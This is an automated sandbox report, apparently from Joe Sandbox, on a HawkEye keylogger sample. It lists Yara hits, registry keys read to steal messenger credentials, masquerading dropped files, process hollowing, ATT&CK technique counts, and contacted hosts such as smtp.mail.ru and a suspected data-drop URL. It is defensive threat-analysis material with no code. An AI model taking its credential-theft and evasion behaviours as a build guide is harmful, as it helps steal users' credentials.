                    Source: Yara match | File source: 5.2.taskhost.exe.40d0240.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3d8949.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.40d0240.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.40b7e00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.6d8949.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c9c0d.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c9c0d.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000002.286698882.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

                    Remote Access Functionality:

                    Yara detected HawkEye Keylogger
                    Source: Yara match | File source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Detected HawkEye Rat
                    Source: taskhost.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: taskhost.exe | String found in binary or memory: HawkEyeKeylogger
                    Source: taskhost.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: taskhost.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmp | String found in binary or memory: ar'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmp | String found in binary or memory: ar#"HawkEye_Keylogger_Stealer_Records_
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05290A8E listen,5_2_05290A8E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05290E9E bind,5_2_05290E9E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05290E6B bind,5_2_05290E6B
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05290A50 listen,5_2_05290A50
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_04FD0FC6 bind,7_2_04FD0FC6
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_04FD0A8E listen,7_2_04FD0A8E
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_04FD0F93 bind,7_2_04FD0F93
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_04FD0A50 listen,7_2_04FD0A50
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_04E00A8E listen,8_2_04E00A8E
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_04E00FC6 bind,8_2_04E00FC6
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_04E00A50 listen,8_2_04E00A50
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_04E00F93 bind,8_2_04E00F93

Mitre Att&ck Matrix

Techniques per tactic column. Digits in square brackets after a technique name are the report's signature counters for that technique.

Initial Access: Replication Through Removable Media [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Windows Management Instrumentation [1]; Native API [11]; Shared Modules [1]; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading [1]; Registry Run Keys / Startup Folder [21]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [512]; Registry Run Keys / Startup Folder [21]; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [41]; Software Packing [13]; DLL Side-Loading [1]; Masquerading [111]; Virtualization/Sandbox Evasion [51]; Access Token Manipulation [1]; Process Injection [512]; Hidden Files and Directories [1]
Credential Access: Input Capture [21]; Credentials in Registry [1]; Credentials In Files [1]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: Peripheral Device Discovery [1]; File and Directory Discovery [3]; System Information Discovery [25]; Query Registry [1]; Security Software Discovery [241]; Process Discovery [2]; Virtualization/Sandbox Evasion [51]; Application Window Discovery [1]; Remote System Discovery [1]; System Network Configuration Discovery [11]
Lateral Movement: Replication Through Removable Media [1]; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: Archive Collected Data [11]; Email Collection [1]; Input Capture [21]; Clipboard Data [2]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: Ingress Tool Transfer [2]; Encrypted Channel [1]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot [1]; Inhibit System Recovery [1]; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 478309 | Sample: aaVb1xEmrd | Start date: 06/09/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 15 other signatures

Process tree (graph node numbers in parentheses):

aaVb1xEmrd.exe (8)
    Dropped: C:\Users\user\AppData\Local\...\taskhost.exe (PE32); C:\Users\user\AppData\Local\...\svchost.exe (PE32); C:\Users\user\AppData\Local\...\iExplorer.exe (PE32); C:\Users\user\AppData\...\MULTIBOT_NEWW.exe (PE32)
    Signatures: Drops PE files with benign system names
    svchost.exe (17)
        Network: smtp.mail.ru 94.100.180.160 (ports 49711, 49718, 49719; MAILRU-AS MailRu RU, Russian Federation); 192.168.2.1 (unknown)
        Dropped: C:\Users\user\AppData\Roaming\...\WIN32.exe (PE32); C:\Users\gghfgh\AppData\...\svchost.exe (PE32)
        Signatures: Antivirus detection for dropped file; Creates an undocumented autostart registry key; Machine Learning detection for dropped file; 2 other signatures
        svchost.exe (28)
            Network: smtp.mail.ru
            Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; 2 other signatures
    taskhost.exe (22)
        Network: whatismyipaddress.com 104.16.154.36 (ports 49712, 49715, 80; CLOUDFLARENET US, United States); 160.192.10.0.in-addr.arpa
        Dropped: C:\Users\user\AppData\...\WindowsUpdate.exe (PE32)
        Signatures: May check the online IP address of the machine; Changes the view of files in windows explorer (hidden files and folders); Creates multiple autostart registry keys; 4 other signatures
        dw20.exe (32)
            Dropped: C:\ProgramData\Microsoft\...\Report.wer (Little-endian)
        vbc.exe (35)
            WerFault.exe (41)
        vbc.exe (37)
            WerFault.exe (43)
    iExplorer.exe (24)
        Dropped: C:\Users\user\AppData\...\Windows Update.exe (PE32)
        Windows Update.exe (39)
            Network: whatismyipaddress.com; smtp.mail.ru; 160.192.10.0.in-addr.arpa
            Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique; 2 other signatures
            vbc.exe (45)
                Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)
            dw20.exe (48)
    MULTIBOT_NEWW.exe (26)
svchost.exe (12)
    Signatures: Installs a global keyboard hook
svchost.exe (14)
    Network: 127.0.0.1 (unknown)

Screenshots

[Screenshot thumbnails of the Windows analysis run; images not reproduced.]

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

Source | Detection | Scanner | Label
aaVb1xEmrd.exe | 70% | Virustotal | -
aaVb1xEmrd.exe | 31% | Metadefender | -
aaVb1xEmrd.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
aaVb1xEmrd.exe | 100% | Avira | HEUR/AGEN.1112163
aaVb1xEmrd.exe | 100% | Joe Sandbox ML | -

                    Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\Windows Update.exe | 100% | Avira | TR/AD.MExecute.lzrac
C:\Users\user\AppData\Roaming\Windows Update.exe | 100% | Avira | SPR/Tool.MailPassView.473
C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\iExplorer.exe | 100% | Avira | TR/AD.MExecute.lzrac
C:\Users\user\AppData\Local\Temp\iExplorer.exe | 100% | Avira | SPR/Tool.MailPassView.473
C:\Users\user\AppData\Local\Temp\taskhost.exe | 100% | Avira | TR/AD.MExecute.lzrac
C:\Users\user\AppData\Local\Temp\taskhost.exe | 100% | Avira | SPR/Tool.MailPassView.473
C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Avira | TR/AD.MExecute.lzrac
C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Avira | SPR/Tool.MailPassView.473
C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\Windows Update.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\iExplorer.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\taskhost.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Joe Sandbox ML | -
C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | 100% | Joe Sandbox ML | -
C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | 71% | Metadefender | -
C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | 86% | ReversingLabs | ByteCode-MSIL.Spyware.Generic

                    Unpacked PE Files

Source | Detection | Scanner | Label
7.2.iExplorer.exe.6d0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
7.2.iExplorer.exe.6d0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
5.0.taskhost.exe.9c0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.0.taskhost.exe.9c0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
10.0.svchost.exe.bc0000.0.unpack | 100% | Avira | TR/Spy.Gen
8.0.Windows Update.exe.3d0000.4.unpack | 100% | Avira | TR/AD.MExecute.lzrac
8.0.Windows Update.exe.3d0000.4.unpack | 100% | Avira | SPR/Tool.MailPassView.473
8.0.Windows Update.exe.3d0000.10.unpack | 100% | Avira | TR/AD.MExecute.lzrac
8.0.Windows Update.exe.3d0000.10.unpack | 100% | Avira | SPR/Tool.MailPassView.473
7.0.iExplorer.exe.6d0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
7.0.iExplorer.exe.6d0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
4.0.svchost.exe.f30000.0.unpack | 100% | Avira | TR/Spy.Gen
19.0.svchost.exe.320000.0.unpack | 100% | Avira | TR/Spy.Gen
5.2.taskhost.exe.9c0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.2.taskhost.exe.9c0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
8.0.Windows Update.exe.3d0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
8.0.Windows Update.exe.3d0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
8.2.Windows Update.exe.3d0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
8.2.Windows Update.exe.3d0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473

                    Domains

                    No Antivirus matches

                    URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cnO | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fontbureau.comoL | 0% | Avira URL Cloud | safe
http://www.fontbureau.comrsh | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
https://biz.mail.ru) | 0% | Avira URL Cloud | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0rsh | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnE | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/) | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/phy/ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Versh | 0% | Avira URL Cloud | safe
http://www.carterandcone.com_ | 0% | Avira URL Cloud | safe
http://www.carterandcone.comlt | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/G | 0% | URL Reputation | safe
http://www.founder.com.cn/cnz | 0% | Avira URL Cloud | safe
http://www.fontbureau.comW | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/T | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/z | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/P | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/; | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/z | 0% | URL Reputation | safe
http://www.founder.com.cn/cn1 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/16 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.comlvfet | 0% | URL Reputation | safe
http://www.tiro.comO | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cntL | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/c | 0% | URL Reputation | safe
http://www.tiro.comic | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Vet | 0% | Avira URL Cloud | safe

                    Domains and IPs

                    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
smtp.mail.ru | 94.100.180.160 | true | false | - | high
whatismyipaddress.com | 104.16.154.36 | true | false | - | high
160.192.10.0.in-addr.arpa | unknown | unknown | false | - | high

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://whatismyipaddress.com/ | false | - | high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.founder.com.cn/cnOtaskhost.exe, 00000005.00000003.231488771.0000000005771000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersGiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                              high
                              http://www.hackforums.net/member.php?action=profile&uid=177092).svchost.exe, 00000004.00000002.259142948.0000000000F32000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000000.254608825.0000000000BC2000.00000002.00020000.sdmp, svchost.exe, 00000013.00000000.267457896.0000000000322000.00000002.00020000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bThetaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.hackforums.net/member.php?action=3Dprofile&uid=3D177092).=svchost.exe, 00000004.00000002.266893331.00000000039C4000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.tiro.comiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comoLtaskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designersiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.comrshtaskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.goodfont.co.kriExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://biz.mail.ru)svchost.exe, 00000004.00000002.266303126.00000000039A2000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.carterandcone.comtaskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://tamina212.000webhostapp.com/data.phpWindows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/Y0rshtaskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cnEtaskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cn/cTheiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://whatismyipaddress.com/-taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmpfalse
                                            high
                                            http://www.hackforums.net/member.phpsvchost.exefalse
                                              high
                                              http://www.galapagosdesign.com/DPleaseiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/)taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://login.yahoo.com/config/logintaskhost.exe, iExplorer.exe, Windows Update.exefalse
                                                high
                                                http://www.fonts.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.site.com/logs.phptaskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.urwpp.deDPleasetaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.nirsoft.net/vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmpfalse
                                                      high
                                                      http://www.urwpp.detaskhost.exe, 00000005.00000003.235558162.0000000005770000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.235337554.0000000005770000.00000004.00000001.sdmpfalse
